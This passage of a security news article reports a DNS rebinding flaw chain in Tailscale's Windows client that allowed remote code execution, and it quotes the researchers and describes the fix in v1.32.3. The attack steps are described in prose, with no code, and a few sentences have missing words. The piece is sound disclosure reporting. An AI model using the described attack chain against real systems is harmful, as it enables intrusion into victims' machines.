“Rebinding is a bug with very niche applicability (HTTP services listening on private networks with no explicit authentication), usually discussed in the context of IoT devices,” McClymont told The Daily Swig. “It’s the type of thing there are talks about it at hacker conferences and such, and yet I’ve never encountered a situation where it’s exploitable during a pentest job.”

The does not authenticate client requests aside from verifying that they’re coming from the same user that is running the Tailscale GUI.

The malicious website can exploit this feature to change the Tailscale “control plane” to an arbitrary server. The “control plane” is the server that stores the public keys of the VPN nodes (also called the tailnet).

**In a tailspin**

As the tailnet administrator, the attacker can now enable Taildrop, a feature that allows users to send files between their devices on a Tailscale network.

Using Taildrop, the attacker can then send an arbitrary executable to the victim’s desktop without marking it as originating from the web, which means Tailscale will be able to launch it without requiring user interaction.

To execute the payload, the attacker can use another feature of the control plane, which demands the Tailscale node to reauthenticate itself when trying to perform a privileged action. The re-authentication prompt includes an address that is forwarded to the GUI and runs it in the browser.

To run the file, the attacker will need to have its full path, which requires knowledge of the victim’s username. To obtain the victim’s username, the attacker can prompt for an SMB path through the Tailscale network. This will send the Windows username to the attacker-controlled tailnet server.

“For the Windows RCE chain, you just need to click a link to an attacker-controlled webpage, or for the malicious Javascript to be served up to you some other way (e.g. malicious JS embedded in an ad on a legit site, or an XSS bug in legit site being exploited to add the malicious code),” McClymont said.

If you were running a stable Tailscale version, the exploit will lie dormant until you next restart Tailscale or reboot your machine, at which point the RCE happens.

“You could argue this is still zero interaction since Windows Update will automatically reboot without interaction eventually,” McClymont said. “If you had the unstable pre-release Tailscale version from right before we found the bugs, we could trigger the exploit immediately without waiting for a reboot.”

**A catch on DNS rebinding**

A recent modification to the policy forbids rebinding a site that was hosted on a public IP to a private IP space. This prevents the attacker from rebinding an internet-hosted malicious website to a local IP address.

But it is still applicable if the attacker is on the same network as the victim. Also, the Firefox browser does not apply the private network address restriction, which makes it vulnerable to internet-hosted attacks.

Moreover, Trau found that PeerAPI, another Tailscale component, runs on the 100.100.100.100 IP and was vulnerable to rebinding, which would give the attacker another pathway to .

Also, if the attacker sends multiple files to the victim’s device through Taildrop, some of them will fail to reach their destination and will remain in a temporary location that is reachable through web calls without private network access restrictions.

Trau published a proof-of-concept video of the attack. Windows machines are especially vulnerable to different variations of the attack. Other operating systems can also be exploited under special circumstances.

The issues have been solved in the latest version of Tailscale. Since Tailscale does not automatically update itself, users should make sure they are running v1.32.3 or later.

“If you’re running HTTP services over Tailscale which rely on Tailscale for authentication (they don’t have their own login page etc.), you need to harden them against rebinding attacks, either by allowlisting Host headers or by running those services only on HTTPS,” McClymont said.

This article has been updated to include comment from researchers.

RECOMMENDED Intel disputes seriousness of Data Centre Manager authentication flaw

Tag

#js